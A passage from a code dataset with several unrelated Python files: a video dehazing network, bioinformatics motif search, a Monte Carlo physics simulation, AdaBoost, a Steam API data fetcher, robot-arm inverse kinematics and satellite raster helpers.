ResidualBlocksWithInputConv(channels * 2, channels, 2)\n\n self.head_j = nn.Sequential(\n nn.Conv2d(channels, channels, 3, 1, 1), nn.LeakyReLU(negative_slope=0.1, inplace=True),\n nn.Conv2d(channels, 3, 1, 1, 0))\n\n def forward(self, feats):\n level = self.level\n num_kv_frames = self.num_kv_frames\n #\n enc_skip = feats['spatial_j'][-1][level]\n if self.upsample:\n feat_j = enc_skip + self.up(feats['decode_j'][-1][level + 1])\n else:\n feat_j = enc_skip\n\n # MPG: prior guide\n if self.prior_guide:\n feat_p = feats['enhance_p'][-1][level]\n feat_j = self.guide_conv(torch.cat([feat_p, feat_j], dim=1))\n q_j = feat_j\n\n # MSR: multi-range\n # prepare features\n kv_j, kv_p = [], []\n nf = len(feats['decode_j']) - 1 # buffer frames: skip current timestep\n for step in range(1, max(num_kv_frames) + 1):\n kv_j.append(feats['decode_j'][max(nf - step, 0)][level] if nf > 0 else feat_j)\n kv_p.append(feats['enhance_p'][max(nf - step, 0)][level])\n # print(f\"num_kv_frames: {num_kv_frames}, nf: {nf}, step: {step}, frame: {max(nf - step, 0)}\")\n kv_j = torch.stack(kv_j, dim=1) # b, nr, c, h, w\n kv_p = torch.stack(kv_p, dim=1) # b, nr, c, h, w\n\n # multi-range alignment\n feats_jr, feats_pr = [], []\n grids = []\n for r, kv_frames in enumerate(num_kv_frames):\n # gradually refine flow\n if self.upsample:\n grid_r = feats['pos_j'][-1][level + 1][:, r]\n # print(f\"level: {level}, grid_r: {grid_r.shape}\")\n b, g, h, w, p = grid_r.shape\n assert p == 3, \"Should be 5-D input sample\"\n grid_r = einops.rearrange(grid_r, 'b g h w p -> (b g) p h w')\n # 'False' is more similar to generated ref points\n grid_r = F.interpolate(grid_r, scale_factor=2, mode='bilinear', align_corners=False)\n grid_r = einops.rearrange(grid_r, '(b g) p h w -> b g h w p', g=g)\n else:\n grid_r = None\n\n # align scene features\n kv_jr = kv_j[:, :kv_frames]\n feat_jr, grid_r, ref_r = self.align_layer(q_j, kv_jr, grid_r)\n feats_jr.append(feat_jr)\n grids.append(grid_r)\n\n # warp prior features\n b, g, h, w, p = grid_r.shape\n feat_pr = kv_p[:, :kv_frames]\n feat_pr = einops.rearrange(feat_pr, 'b nf (g c) h w -> (b g) c nf h w', g=g)\n _grid = einops.rearrange(grid_r, 'b g h w p -> (b g) h w p')\n flow = get_flow_from_grid(_grid, ref_r, d=kv_frames)\n feat_pr = flow_warp_5d(feat_pr, flow.unsqueeze(1))\n assert feat_pr.shape[2] == 1\n feats_pr.append(feat_pr.squeeze(2))\n feats['pos_j'][-1][level] = torch.stack(grids, dim=1)\n feats['ref_j'][-1][level] = ref_r\n\n # GMRA\n # prepare faetures\n feats_jr = torch.stack(feats_jr, dim=1)\n b, nr, c, h, w = feats_jr.shape\n scale = c ** -0.5\n\n # attn: j\n q_j = einops.rearrange(feat_j, 'b c h w -> (b h w) c').unsqueeze(1) # bhw 1 c\n k_j = einops.rearrange(feats_jr, 'b nr c h w -> (b h w) nr c') # bhw nr c\n attn_j = q_j @ k_j.transpose(-2, -1) * scale # bhw 1 nr\n # attn: p\n q_p = feats['enhance_p'][-1][level]\n q_p = einops.rearrange(q_p, 'b c h w -> (b h w) c').unsqueeze(1) # bhw 1 c\n k_p = torch.stack(feats_pr, dim=1)\n k_p = einops.rearrange(k_p, 'b nr c h w -> (b h w) nr c') # bhw nr c\n attn_p = q_p @ k_p.transpose(-2, -1) * scale # bhw 1 nr\n # attn\n attn = attn_j + self.aggre_beta * attn_p\n attn = F.softmax(attn, dim=-1)\n\n v = einops.rearrange(feats_jr, 'b nr c h w -> (b h w) nr c') # bhw nr c\n feat = attn @ v\n assert feat.shape[1] == 1\n feat = einops.rearrange(feat.squeeze(1), '(b h w) c -> b c h w', h=h, w=w)\n feat = self.aggre_conv(torch.cat([feat, feat_j], dim=1))\n feats[f'decode_j'][-1][level] = feat\n\n # estimate J\n out_j = self.head_j(feat)\n feats['stage_j'][level] = out_j\n\n return feats\n\n\n@BACKBONES.register_module()\nclass MAPNet(BaseModule):\n \"\"\"MAP-Net.\n\n MAP-Net in \"Video Dehazing via a Multi-Range Temporal Alignment Network with Physical Prior\".\n \"\"\"\n RGB_MEAN = [0.485, 0.456, 0.406]\n RGB_STD = [0.229, 0.224, 0.225]\n\n def __init__(self,\n backbone,\n neck,\n upsampler,\n channels=32,\n num_trans_bins=32,\n align_depths=(1, 1, 1, 1),\n num_kv_frames=(1, 2, 3),\n ):\n super().__init__()\n\n self.backbone = builder.build_component(backbone)\n self.neck = builder.build_component(neck)\n self.upsampler = builder.build_component(upsampler)\n\n num_stages = len(align_depths)\n self.num_stages = num_stages\n\n # mpg\n self.num_trans_bins = num_trans_bins\n\n # msr: assume num_kv_frames is consecutive\n self.num_kv_frames = num_kv_frames\n\n # align & aggregate\n assert channels % 32 == 0\n num_heads = [channels // 32 for _ in range(num_stages)]\n kernel_sizes = [9, 7, 5, 3]\n\n self.prior_decoder_layers = nn.ModuleList()\n self.scene_decoder_layers = nn.ModuleList()\n\n guided_levels = (2, 3) # memory consumption\n for s in range(num_stages):\n self.prior_decoder_layers.append(\n PriorDecodeLayer(\n channels, s,\n upsample=s < num_stages - 1, memory_enhance=s in guided_levels\n ))\n self.scene_decoder_layers.append(\n SceneDecodeLayer(\n channels, s,\n upsample=s < num_stages - 1, prior_guide=s in guided_levels,\n num_kv_frames=num_kv_frames, align_depth=align_depths[s],\n num_heads=num_heads[s], kernel_size=kernel_sizes[s]\n ))\n\n self.window_size = 32 # for padding\n rgb_mean = torch.Tensor(self.RGB_MEAN).reshape(1, 3, 1, 1)\n rgb_std = torch.Tensor(self.RGB_STD).reshape(1, 3, 1, 1)\n self.register_buffer('rgb_mean', rgb_mean)\n self.register_buffer('rgb_std', rgb_std)\n\n @property\n def with_neck(self):\n \"\"\"bool: whether the segmentor has neck\"\"\"\n return hasattr(self, 'neck') and self.neck is not None\n\n def check_image_size(self, img):\n # https://github.com/JingyunLiang/SwinIR/blob/5aa89a7b275eeddc75cd7806378c89d23f298c48/main_test_swinir.py#L66\n # https://github.com/ZhendongWang6/Uformer/issues/32\n _, _, h, w = img.size()\n window_size = self.window_size\n mod_pad_h = (window_size - h % window_size) % window_size\n mod_pad_w = (window_size - w % window_size) % window_size\n out = F.pad(img, (0, mod_pad_w, 0, mod_pad_h), 'reflect')\n return out\n\n def extract_feat(self, img):\n \"\"\"Extract features from images.\"\"\"\n x = self.backbone(img)\n if self.with_neck:\n x = self.neck(x)\n return x\n\n def split_feat(self, feats, feat):\n feat_p, feat_j = [], []\n for s in range(self.num_stages):\n c = feat[s].shape[1]\n split_size_or_sections = c // 2\n x = torch.split(feat[s], split_size_or_sections, dim=1)\n feat_p.append(x[0])\n feat_j.append(x[1])\n feats['spatial_p'].append(feat_p)\n feats['spatial_j'].append(feat_j)\n return feats\n\n def decode(self, feats):\n # init\n keys = ['decode_p', 'token_p', 'enhance_p',\n 'decode_j', 'pos_j', 'ref_j']\n for k in keys:\n feats[k].append([None] * self.num_stages)\n keys = ['stage_t', 'stage_a', 'stage_j']\n for k in keys:\n feats[k] = [None] * self.num_stages\n\n for s in range(self.num_stages - 1, -1, -1):\n feats = self.prior_decoder_layers[s](feats)\n feats = self.scene_decoder_layers[s](feats)\n\n return feats\n\n def forward(self, lqs):\n \"\"\"\n Forward function\n\n Args:\n lqs (Tensor): Input hazy sequence with shape (n, t, c, h, w).\n\n Returns:\n out (Tensor): Output haze-free sequence with shape (n, t, c, h, w).\n \"\"\"\n n, T, c, h, w = lqs.shape\n\n feats = {\n 'spatial_p': [], 'decode_p': [], 'token_p': [], 'enhance_p': [],\n 'spatial_j': [], 'decode_j': [], 'pos_j': [], 'ref_j': [],\n 'stage_j': [], 'stage_t': [], 'stage_a': []\n }\n\n out_js = []\n img_01s = []\n aux_js, aux_is = [], []\n\n for i in range(0, T):\n # print(f\"\\ntime: {i}\")\n img = self.check_image_size(lqs[:, i, :, :, :])\n img_01 = img * self.rgb_std + self.rgb_mean # to the range of [0., 1.]\n img_01s.append(img_01)\n\n # encode\n feat = self.extract_feat(img) # tuple of feats, (4s, 8s, 16s, ...)\n feats = self.split_feat(feats, feat)\n\n # decode\n feats = self.decode(feats)\n\n # get output\n feat_j = feats['decode_j'][-1][0]\n out = self.upsampler(feat_j)\n out = img_01 + out\n\n if self.training:\n assert h == out.shape[2] and w == out.shape[3]\n out_js.append(out[:, :, 0: h, 0: w].contiguous())\n\n # auxiliary output for the current timestep\n if self.training:\n aux_j, aux_i = [], []\n for s in range(self.num_stages):\n tmp_j = F.interpolate(feats['stage_j'][s], size=img.shape[2:], mode='bilinear')\n out_j = img_01 + tmp_j # residue\n tmp_t = F.interpolate(feats['stage_t'][s], size=img.shape[2:], mode='bilinear').clip(0, 1)\n tmp_a = feats['stage_a'][s]\n out_i = out_j * tmp_t + tmp_a * (1 - tmp_t)\n aux_j.append(out_j[:, :, 0: h, 0: w])\n aux_i.append(out_i[:, :, 0: h, 0: w])\n aux_js.append(aux_j)\n aux_is.append(aux_i)\n\n # memory management\n feats['spatial_j'].pop(0)\n feats['spatial_p'].pop(0)\n if len(feats['decode_j']) > max(self.num_kv_frames):\n feats['decode_j'].pop(0)\n feats['decode_p'].pop(0)\n feats['enhance_p'].pop(0)\n assert len(feats['decode_p']) == len(feats['decode_j'])\n if not self.training:\n feats['pos_j'].pop(0)\n feats['ref_j'].pop(0)\n\n out = dict(out=torch.stack(out_js, dim=1)) # output dict\n\n # auxiliary output for a sequence\n if self.training:\n pos, ref = [], [] # sampling locations\n for s in range(self.num_stages):\n pos.append(torch.stack([feats['pos_j'][i][s] for i in range(T)], dim=1))\n ref.append(torch.stack([feats['ref_j'][i][s] for i in range(T)], dim=1))\n out['pos'] = pos # b, T, nr, g, h, w, 3\n out['ref'] = ref # b, T, 1, h, w, 3\n if self.training:\n aux_j, aux_i = [], [] # Js, Is\n for s in range(self.num_stages):\n aux_j.append(torch.stack([aux_js[i][s] for i in range(T)], dim=1))\n aux_i.append(torch.stack([aux_is[i][s] for i in range(T)], dim=1))\n out['aux_j'] = aux_j\n out['aux_i'] = aux_i\n out['img_01'] = torch.stack(img_01s, dim=1)\n\n return out\n\n def init_weights(self, pretrained=None, strict=True):\n \"\"\"Init weights for models.\n\n Args:\n pretrained (str, optional): Path for pretrained weights. If given\n None, pretrained weights will not be loaded. Defaults: None.\n strict (boo, optional): Whether strictly load the pretrained model.\n Defaults to True.\n \"\"\"\n logger = get_root_logger()\n logger.info(f\"Init weights: {pretrained}\")\n if isinstance(pretrained, str):\n load_checkpoint(self, pretrained, strict=strict, logger=logger)\n elif self.backbone.init_cfg is not None:\n self.backbone.init_weights()\n elif pretrained is not None:\n raise TypeError(f'\"pretrained\" must be a str or None. '\n f'But received {type(pretrained)}.')\n","repo_name":"jiaqixuac/MAP-Net","sub_path":"mmedit/models/backbones/map_backbones/mapnet_net.py","file_name":"mapnet_net.py","file_ext":"py","file_size_in_byte":17263,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"21"} +{"seq_id":"2234109870","text":"from MotifGen import get_motifs\nfrom RandomMotifPicker import get_random_motifs\n\nimport sys\nimport os\n\nsys.path.append(os.path.abspath(\"../week3\"))\nfrom Profile import get_profile\nfrom Score import get_score\n\n\ndef randomized_motif_search(dna, k, t, runs=1):\n final_motifs = []\n final_motifs_score = k * t\n for times in range(runs):\n best_motifs = get_random_motifs(dna, k)\n best_score = get_score(dna=best_motifs)\n while True:\n profile = get_profile(dna=best_motifs, laplacian_pseudocount=1)\n next_motifs = get_motifs(profile, dna)\n next_motifs_score = get_score(dna=next_motifs)\n if next_motifs_score < best_score:\n best_score = next_motifs_score\n best_motifs = next_motifs\n else:\n break\n\n if best_score < final_motifs_score:\n final_motifs_score = best_score\n final_motifs = best_motifs\n\n return final_motifs, final_motifs_score\n\n\nif __name__ == \"__main__\":\n with open(\"dataset_161_5.txt\") as f:\n k, t = map(int, f.readline().strip().split())\n dna = [f.readline().strip() for _ in range(t)]\n best_motifs, best_score = randomized_motif_search(dna, k, t, 1000)\n with open(\"ex1output.txt\", \"w\") as output:\n output.write(\"\\n\".join(best_motifs))\n","repo_name":"hot9cups/uhh-stuff","sub_path":"Finding Hidden Messages in DNA (Bioinformatics I)/week4/RandomizedMotifSearch.py","file_name":"RandomizedMotifSearch.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17245614609","text":"from random import random,randrange\nfrom math import exp,pi\nfrom numpy import ones\nimport matplotlib.pyplot as plt\nimport os \n\ndirectory_name = os.path.dirname(__file__) # find directory of current running python file\nos.chdir(directory_name) # change the working directory to the directory that includes the running file\n\nN = 1000\nT = [10.0, 40.0, 100.0, 400.0, 1200.0, 1600.0]\nfor t in T:\n steps = 250000\n\n # Create a 2D array to store the quantum numbers\n n = ones([N,3],int)\n\n # Main loop\n eplot = []\n E = 3*N*pi*pi/2\n for k in range(steps):\n\n # Choose the particle and the move\n i = randrange(N)\n j = randrange(3)\n if random()<0.5:\n dn = 1\n dE = (2*n[i,j]+1)*pi*pi/2\n else:\n dn = -1\n dE = (-2*n[i,j]+1)*pi*pi/2\n\n # Decide whether to accept the move\n if n[i,j]>1 or dn==1:\n if random() < exp(-dE/t):\n n[i,j] += dn\n E += dE\n\n eplot.append(E)\n\n # Make the graph\n plt.plot(eplot)\n plt.ylabel(\"Energy\")\n plt.xlabel(\"Step Number\")\n plt.savefig(\"Lab11Q1plot1.png\", dpi = 300, bbox_inches = \"tight\")\n\n # this next part is from Nico Grisouard\n\n # This calculates the energy of each particle, neglecting constant factors\n energy_n = n[:, 0]**2 + n[:, 1]**2 + n[:, 2]**2 # n[:, 0]**2 => every row from zeroth column\n\n # This calculates the frequency distribution and creates a plot\n plt.figure(2)\n plt.clf()\n hist_output = plt.hist(energy_n, 50)\n plt.xlabel()\n plt.ylabel()\n\n # This is the frequency distribution\n energy_frequency = hist_output[0]\n\n # This is what the x-axis of the plot should look like\n # if we plot the energy distribution as a function of n\n # the 2nd axis of hist_output contains the boundaries of the array.\n # Instead, we want their central value, below.\n energy_vals = 0.5*(hist_output[1][:-1] + hist_output[1][1:])\n n_vals = energy_vals**0.5\n\n # Create the desired plot\n plt.figure(3)\n plt.clf()\n plt.bar(n_vals, energy_frequency, width=0.1)\n plt.xlabel(r\"$n = \\sqrt{e_{n}}$\")\n plt.ylabel(\"Number of Particles\")\n plt.title(\"Energy Frequency Histogram | T = \" + str(int(t)))\n plt.savefig(\"Lab11Q1plot2_\" + str(int(t)) + \".png\", dpi = 300, bbox_inches = \"tight\")\n\nplt.show()\n\n","repo_name":"brendanhalliday/Computational-Physics","sub_path":"LABS/Lab11/mcsim.py","file_name":"mcsim.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18147232757","text":"import numpy as np\r\nfrom torch import fix\r\n\r\ndef adaboost(\r\n X: np.ndarray,\r\n y: np.ndarray,\r\n T: int):\r\n \"\"\"\r\n adaboost实现\r\n\r\n 参数:\r\n T (int): 次数\r\n 返回值:\r\n thetas (np.ndarray): 模型阈值\r\n alphas (np.ndarray): 模型权重\r\n signs (np.ndarray): 模型方向\r\n e_ins (np.ndarray): 模型训练误差\r\n idxs (np.ndarray): 模型选择维度\r\n u_sums (np.ndarray): 样本权重\r\n eps (np.ndarray): 加权错误\r\n \"\"\"\r\n thetas = np.zeros(T)\r\n alphas = np.zeros(T)\r\n signs = np.zeros(T)\r\n e_ins = np.zeros(T)\r\n idxs = np.zeros(T,dtype=np.int)\r\n u_sums = np.zeros(T)\r\n eps = np.zeros(T)\r\n\r\n fix_theta = np.sort(X, axis=0)\r\n fix_theta = (fix_theta[:-1] + fix_theta[1:])/2\r\n fix_theta = np.r_[fix_theta, fix_theta[-1].reshape(1, -1) * 1.1]\r\n u = np.ones((X.shape[0], 1))/X.shape[0]\r\n\r\n for i in range(T):\r\n u_sums[i] = np.sum(u)\r\n (thetas[i], signs[i], e_ins[i], u, alphas[i], idxs[i], eps[i]) = decision_stump(X, y, u, fix_theta)\r\n \r\n return thetas, alphas, signs, e_ins, idxs, u_sums, eps\r\n\r\ndef decision_stump(\r\n X: np.ndarray,\r\n y: np.ndarray,\r\n u: np.ndarray,\r\n thetas: np.ndarray\r\n ):\r\n \"\"\"\r\n 决策桩实现\r\n \"\"\"\r\n sign = 1 # 方向\r\n min_e_in = 1.0\r\n best_theta = 0\r\n u_sum = np.sum(u)\r\n idx = 0\r\n dim = X.shape[1]\r\n y = y.reshape((-1, 1))\r\n\r\n for theta in thetas:\r\n pos_pred = np.where(X > theta, 1, -1)\r\n neg_pred = np.where(X < theta, 1, -1)\r\n \r\n err_pos = np.sum((pos_pred != y) * u, axis=0)\r\n err_neg = np.sum((neg_pred != y) * u, axis=0)\r\n err_all = np.append(err_pos,err_neg)\r\n\r\n i = np.argmin(err_all)\r\n min_err = err_all[i]\r\n\r\n if min_e_in > min_err:\r\n min_e_in = min_err\r\n idx = i % dim\r\n sign = - np.sign(i - 1.5)\r\n best_theta = theta[idx]\r\n \r\n x = X[:, idx]\r\n pred = np.where(x > best_theta , sign * 1, sign * -1).reshape((-1,1))\r\n eps = np.sum((pred != y) * u) / u_sum\r\n t = np.sqrt((1 - eps) / eps)\r\n alpha = np.log(t)\r\n u = u * np.exp(-y * alpha * pred) # 优化u的求法 见技法11节\r\n return (best_theta, sign, min_e_in, u, alpha, idx, eps)\r\n\r\ndef predict(\r\n thetas: np.ndarray,\r\n signs: np.ndarray,\r\n idxs: np.ndarray,\r\n alphas: np.ndarray,\r\n X: np.ndarray,\r\n ):\r\n \"\"\"\r\n 计算G的误差\r\n\r\n 参数:\r\n thetas (np.ndarray): 阈值\r\n signs (np.ndarray): 方向\r\n idxs (np.ndarray): 选择的X维度\r\n alphas (np.ndarray): 假设权重\r\n \"\"\"\r\n\r\n X_choose = X[:, idxs]\r\n pred = signs * np.sign((X_choose - thetas))\r\n pred = np.sign(np.sum(pred * alphas, axis = 1))\r\n return pred\r\n\r\ndef compute_err(y_hat, y):\r\n return np.mean(y_hat!=y)","repo_name":"WArewh/college","sub_path":"ai/foundation_technique/hw6/adaboost_stump.py","file_name":"adaboost_stump.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72452308534","text":"# Ввод числа и пустой список для ответов\r\nn = int(input('Введите целое число: '))\r\nmultiple_list = []\r\n\r\n# Проверка кратности числе от 1 до n на 7\r\nfor i in range(n):\r\n if i % 7 == 0:\r\n multiple_list.append(i)\r\n\r\n# Вывод чисел\r\nprint(f'Числа, кратные 7 в диапазоне от 0 до {n}: {multiple_list}')","repo_name":"myataSD/DZ-Dlya-cursa-","sub_path":"Python Core/DZ3/multiple of seven — копия.py","file_name":"multiple of seven — копия.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19803468440","text":"import requests\nimport json\nfrom pathlib import Path\nfrom alive_progress import alive_it\n\n\ndef get_steam_package_data(packages: list, refresh_data=True):\n \"\"\" connects to steam packagedetails api and downloads data\n\n Arguments:\n packages(list): list of packageids to collect data for\n\n Returns:\n list(dict): a list of dictionaries of all the data collected\n \"\"\"\n data_path = Path(__file__).parent.parent.joinpath('data')\n base_url = \"https://store.steampowered.com/api/packagedetails/\"\n\n data = []\n\n if refresh_data:\n \n for package_id in alive_it(packages, title=\"Getting data\"):\n\n response = requests.get(base_url, params={\"packageids\": package_id})\n json_response = json.loads(response.text)\n # if we get a response, and the \"success\" == True\n if json_response and json_response[str(package_id)][\"success\"]:\n d = json_response[str(package_id)][\"data\"]\n d[\"package_id\"] = package_id\n data.append(d)\n else:\n data.append({\"package_id\": package_id})\n\n # writing to a file in case we want to look at the raw data from latest load\n with open(f\"{data_path}/package_data.json\", 'w') as f:\n f.write(json.dumps(data, indent=4))\n\n else:\n with open(f\"{data_path}/package_data.json\", 'r') as f:\n data = json.load(f)\n\n return data\n\n","repo_name":"MazrimT/steam-api","sub_path":"src/helpers/steam.py","file_name":"steam.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28147262025","text":"import sympy as sp\nfrom sympy.physics.mechanics import dynamicsymbols, Point, ReferenceFrame\nfrom math import pi\nimport numpy as np\nfrom mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\n\n\ndef plot_arm(ax, T_list):\n def plot_axis(ax, x, y, z, x_a, y_a, z_a):\n ax.quiver(x, y, z, x_a[0], x_a[1], x_a[2], length=1, color='r', normalize=False)\n ax.quiver(x, y, z, y_a[0], y_a[1], y_a[2], length=1, color='g', normalize=False)\n ax.quiver(x, y, z, z_a[0], z_a[1], z_a[2], length=1, color='b', normalize=False)\n\n plot_axis(ax, 0, 0, 0, [1, 0, 0], [0, 1, 0], [0, 0, 1])\n T = sp.eye(4)\n for T_tmp in T_list:\n T = T * T_tmp\n plot_axis(ax, T[0, 3], T[1, 3], T[2, 3], T[0:3, 0], T[0:3, 1], T[0:3, 2])\n\n\ndef forward(q):\n theta, a, d, alpha = dynamicsymbols(\"theta a d alpha\")\n\n T = sp.Matrix([[sp.cos(theta), -sp.sin(theta) * sp.cos(alpha), sp.sin(theta) * sp.sin(alpha), a * sp.cos(theta)],\n [sp.sin(theta), sp.cos(theta) * sp.cos(alpha), -sp.sin(alpha) * sp.cos(theta), a * sp.sin(theta)],\n [0, sp.sin(alpha), sp.cos(alpha), d], [0, 0, 0, 1]])\n\n T1 = T.subs({theta: 0, a: 2.5, d: 5.4 + q[0], alpha: -pi / 2})\n T2 = T.subs({theta: q[1], a: 0, d: 3.6, alpha: pi / 2})\n T3 = T.subs({theta: q[2], a: 6.9, d: 2, alpha: 0})\n T4 = T.subs({theta: q[3], a: 12.5, d: 0, alpha: 0})\n return [T1, T2, T3, T4]\n\n\ndef forward1(q):\n theta, a, d, alpha = dynamicsymbols(\"theta a d alpha\")\n\n T = sp.Matrix([[sp.cos(theta), -sp.sin(theta) * sp.cos(alpha), sp.sin(theta) * sp.sin(alpha), a * sp.cos(theta)],\n [sp.sin(theta), sp.cos(theta) * sp.cos(alpha), -sp.sin(alpha) * sp.cos(theta), a * sp.sin(theta)],\n [0, sp.sin(alpha), sp.cos(alpha), d], [0, 0, 0, 1]])\n\n T1 = T.subs({theta: 0, a: 2.5, d: 5.4 + q[0], alpha: pi / 2})\n T2 = T.subs({theta: q[1], a: 0, d: 3.6, alpha: pi / 2})\n T3 = T.subs({theta: q[2], a: 6.9, d: 2, alpha: 0})\n T4 = T.subs({theta: q[3], a: 12.5, d: 0, alpha: 0})\n return [T1, T2, T3, T4]\n\n\ndef Jacobian(T1, T2, T3, T4):\n T01 = T1\n T02 = T01 * T2\n T03 = T02 * T3\n T04 = T03 * T4\n\n z0 = np.array([0, 0, 1])\n o0 = np.array([0, 0, 0])\n\n z1 = np.array(T01[0:3, 2]).astype(np.float64).squeeze(-1)\n o1 = np.array(T01[0:3, 3]).astype(np.float64).squeeze(-1)\n\n z2 = np.array(T02[0:3, 2]).astype(np.float64).squeeze(-1)\n o2 = np.array(T02[0:3, 3]).astype(np.float64).squeeze(-1)\n\n z3 = np.array(T03[0:3, 2]).astype(np.float64).squeeze(-1)\n o3 = np.array(T03[0:3, 3]).astype(np.float64).squeeze(-1)\n\n o4 = np.array(T04[0:3, 3]).astype(np.float64).squeeze(-1)\n\n J1 = np.zeros(6)\n # J1[0:3] = z0\n J2 = np.concatenate([np.cross(z1, o4 - o1), z1], 0)\n J3 = np.concatenate([np.cross(z2, o4 - o2), z2], 0)\n J4 = np.concatenate([np.cross(z3, o4 - o3), z3], 0)\n\n J = np.array([J1, J2, J3, J4]).T\n return J\n\n\nq = np.array([0.0, pi / 8, pi / 8 * 3, -pi / 2])\nT_list = forward(q)\nd = 0\nend_positions = []\n\nfig = plt.figure()\nax = fig.add_subplot(projection='3d')\n\ndt = 0.1\nfor i in np.arange(0, 5, dt):\n ax = fig.add_subplot(projection='3d')\n ax.set_xlim3d([0, 20.0])\n ax.set_xlabel('X')\n\n ax.set_ylim3d([0, 20.0])\n ax.set_ylabel('Y')\n\n ax.set_zlim3d([0, 20.0])\n ax.set_zlabel('Z')\n\n T_list = forward(q)\n J = Jacobian(T_list[0], T_list[1], T_list[2], T_list[3])\n T = T_list[0] * T_list[1] * T_list[2] * T_list[3]\n\n dedt = np.array([0, 0, 1, 0, 0, 0]).astype(np.float)\n dqdt = np.linalg.lstsq(J, dedt)[0]\n print(q)\n\n q += dqdt * dt\n plot_arm(ax, T_list)\n\n end_positions.append(np.array([float(T[0, 3]), float(T[1, 3]), float(T[2, 3])]))\n np_end_pos = np.array(end_positions)\n ax.scatter(np_end_pos[:, 0], np_end_pos[:, 1], np_end_pos[:, 2])\n plt.pause(0.01)\n plt.clf()\nax = fig.add_subplot(projection='3d')\nax.set_xlim3d([0, 20.0])\nax.set_xlabel('X')\n\nax.set_ylim3d([0, 20.0])\nax.set_ylabel('Y')\n\nax.set_zlim3d([0, 20.0])\nax.set_zlabel('Z')\nnp_end_pos = np.array(end_positions)\nplot_arm(ax, T_list)\nax.scatter(np_end_pos[:, 0], np_end_pos[:, 1], np_end_pos[:, 2])\nplt.show()","repo_name":"balloon61/Manipulator-Trajectory-Tracking","sub_path":"inverse_kinematic.py","file_name":"inverse_kinematic.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36103399617","text":"import os\nimport sys\nimport gdal\nimport numpy as np\nimport math\nfrom py_snap_helpers import *\n\ndef get_slstr_nodata_mask(classif_flags):\n \n # 'unfilled_pixel': 128\n \n b1 = int(math.log(128, 2))\n b2 = b1\n \n return _capture_bits(classif_flags.astype(np.int64), b1, b2)\n\ndef get_slstr_confidence_mask(slstr_confidence, classif_flags):\n \n pixel_classif_flags = {'coastline': 1,\n 'cosmetic': 256,\n 'day': 1024,\n 'duplicate': 512,\n 'inland_water': 16,\n 'land': 8,\n 'ocean': 2,\n 'snow': 8192,\n 'spare': 64,\n 'summary_cloud': 16384,\n 'summary_pointing': 32768,\n 'sun_glint': 4096,\n 'tidal': 4,\n 'twilight': 2048,\n 'unfilled': 32}\n \n \n b1 = int(math.log(pixel_classif_flags[slstr_confidence], 2))\n b2 = b1\n \n return _capture_bits(classif_flags.astype(np.int64), b1, b2)\n\ndef get_slstr_mask(slstr_cloud, classif_flags):\n \n pixel_classif_flags = {'11_12_view_difference': 2048,\n '11_spatial_coherence': 64,\n '1_37_threshold': 2,\n '1_6_large_histogram': 8,\n '1_6_small_histogram': 4,\n '2_25_large_histogram': 32,\n '2_25_small_histogram': 16,\n '3_7_11_view_difference': 4096,\n 'fog_low_stratus': 1024,\n 'gross_cloud': 128,\n 'medium_high': 512,\n 'spare': 16384,\n 'thermal_histogram': 8192,\n 'thin_cirrus': 256,\n 'visible': 1}\n \n \n b1 = int(math.log(pixel_classif_flags[slstr_cloud], 2))\n b2 = b1\n \n return _capture_bits(classif_flags.astype(np.int64), b1, b2)\n\n\ndef _capture_bits(arr, b1, b2):\n \n width_int = int((b1 - b2 + 1) * \"1\", 2)\n \n return ((arr >> b2) & width_int).astype('uint8')\n\ndef export_s3(bands):\n\n ds = gdal.Open(bands[0])\n \n width = ds.RasterXSize\n height = ds.RasterYSize\n\n input_geotransform = ds.GetGeoTransform()\n input_georef = ds.GetProjectionRef()\n \n ds = None\n \n driver = gdal.GetDriverByName('GTiff')\n \n output = driver.Create('s3.tif', \n width, \n height, \n len(bands), \n gdal.GDT_Float32)\n\n output.SetGeoTransform(input_geotransform)\n output.SetProjection(input_georef)\n \n for index, band in enumerate(bands):\n print(band)\n temp_ds = gdal.Open(band) \n \n band_data = temp_ds.GetRasterBand(1).ReadAsArray()\n output.GetRasterBand(index+1).WriteArray(band_data)\n \n output.FlushCache()\n \n return True\n\ndef read_s3(bands):\n\n gdal.UseExceptions()\n \n stack = []\n \n for index, band in enumerate(bands):\n \n temp_ds = gdal.Open(band) \n \n if not temp_ds:\n raise ValueError()\n \n stack.append(temp_ds.GetRasterBand(1).ReadAsArray())\n \n return np.dstack(stack)\n\n","repo_name":"ec-better/ewf-wfp-03-01-02","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34340209441","text":"import torch\nimport torch.nn as nn\n\n\nclass RMSNorm(nn.Module):\n \"\"\"An alternate to layer normalization, without mean centering and the learned bias [1]\n\n References\n ----------\n .. [1] Zhang, Biao, and Rico Sennrich. \"Root mean square layer normalization.\" Advances in Neural Information\n Processing Systems 32 (2019).\n \"\"\"\n\n def __init__(self, dim, eps=1e-8):\n super().__init__()\n self.scale = dim**-0.5\n self.eps = eps\n self.g = nn.Parameter(torch.ones(dim))\n\n def forward(self, x):\n norm = torch.norm(x, dim=-1, keepdim=True) * self.scale\n return x / norm.clamp(min=self.eps) * self.g\n\n\nclass LayerNormNoBias(nn.LayerNorm):\n def __init__(self, input_size, **kwargs):\n super().__init__(input_size, elementwise_affine=False, **kwargs)\n\n\nclass LayerNorm(nn.LayerNorm):\n def __init__(self, input_size, **kwargs) -> None:\n super().__init__(input_size, **kwargs)\n\n\nclass RINorm(nn.Module):\n def __init__(self, input_dim: int, eps=1e-5, affine=True):\n 